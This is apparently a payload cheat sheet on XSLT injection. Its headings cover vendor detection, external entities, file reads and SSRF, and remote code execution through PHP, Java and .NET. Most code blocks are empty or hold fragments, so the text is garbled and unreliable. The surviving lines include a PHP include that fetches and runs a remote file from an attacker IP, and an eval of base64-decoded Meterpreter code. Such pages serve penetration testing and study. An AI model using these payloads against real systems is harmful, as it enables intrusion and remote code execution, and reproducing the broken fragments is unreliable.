# XSLT Injection
> Processing an unvalidated XSL stylesheet can allow an attacker to change the structure and contents of the resultant XML, include arbitrary files from the file system, or execute arbitrary code
## Summary
- [Tools](#tools)
- [Exploit](#exploit)
- [Determine the vendor and version](#determine-the-vendor-and-version)
- [External Entity](#external-entity)
- [Read files and SSRF using document](#read-files-and-ssrf-using-document)
- [Remote Code Execution with Embedded Script Blocks](#remote-code-execution-with-embedded-script-blocks)
- [Remote Code Execution with PHP wrapper](#remote-code-execution-with-php-wrapper)
- [Remote Code Execution with Java](#remote-code-execution-with-java)
- [Remote Code Execution with Native .NET](#remote-code-execution-with-native-net)
- [References](#references)
## Tools
## Exploit
### Determine the vendor and version
```xml
```
```xml
Version:
Vendor:
Vendor URL:
```
### External Entity
```xml
]>
Fruits &ext_file;:
- :
```
### Read files and SSRF using document
```xml
Fruits:
- :
```
### Remote Code Execution with Embedded Script Blocks
```xml
--- BEGIN COMMAND OUTPUT ---
--- END COMMAND OUTPUT ---
```
### Remote Code Execution with PHP wrapper
Execute the function `readfile`.
```xml
```
Execute the function `scandir`.
```xml
```
Execute a remote php file using `assert`
```xml
include("http://10.10.10.10/test.php")
```
Execute a PHP meterpreter using PHP wrapper.
```xml
eval(base64_decode('Base64-encoded Meterpreter code'))
```
### Remote Code Execution with Java
```xml
```
```xml
.
```
### Remote Code Execution with Native .NET
```xml
```
## References
* [From XSLT code execution to Meterpreter shells - 02 July 2012 - @agarri](https://www.agarri.fr/blog/archives/2012/07/02/from_xslt_code_execution_to_meterpreter_shells/index.html)
* [XSLT Injection - Fortify](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection)
* [XSLT Injection Basics - Saxon](https://blog.hunniccyber.com/ektron-cms-remote-code-execution-xslt-transform-injection-java/)